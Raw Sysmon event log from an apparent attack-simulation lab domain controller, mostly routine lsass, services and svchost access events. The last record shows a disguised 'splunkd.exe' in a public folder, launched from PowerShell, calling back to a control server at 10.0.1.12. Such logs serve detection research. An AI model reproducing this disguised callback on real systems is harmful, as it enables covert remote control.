09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.817{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.817{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:09.739{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001052943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:20:09.739{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001052942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBD-6151-0A00-00000000FD01}624708C:\Windows\system32\services.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBD-6151-0A00-00000000FD01}624312C:\Windows\system32\services.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.715{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBD-6151-0B00-00000000FD01}6402744C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.708{5EBD8912-8CBD-6151-0B00-00000000FD01}6402744C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:09.708{5EBD8912-8CBF-6151-0D00-00000000FD01}900\RpcProxy\593C:\Windows\system32\svchost.exe 13241300x80000000000000001052933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:09.708{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 17141700x80000000000000001052932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:09.692{5EBD8912-8CBD-6151-0B00-00000000FD01}640\71bd4cf4485502e9C:\Windows\system32\lsass.exe 17141700x80000000000000001052931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:09.692{5EBD8912-8CBD-6151-0B00-00000000FD01}640\RpcProxy\49673C:\Windows\system32\lsass.exe 10341000x80000000000000001052930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.332{5EBD8912-8CC0-6151-1000-00000000FD01}4401112C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001052929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.307{5EBD8912-8CC8-6151-2200-00000000FD01}26362660C:\Windows\system32\conhost.exe{5EBD8912-8CC8-6151-2100-00000000FD01}2628C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.307{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.291{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC8-6151-2200-00000000FD01}2636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.291{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC8-6151-2100-00000000FD01}2628C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.291{5EBD8912-8CC0-6151-1800-00000000FD01}19522512osoft.PowerShell.ComWindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC8-6151-2100-00000000FD01}2628C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+3c8dc|C:\Windows\System32\shell32.dll+e2157|C:\Windows\System32\shell32.dll+e20b5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64) 154100x80000000000000001052924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.250{5EBD8912-8CC8-6151-2100-00000000FD01}2628C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT 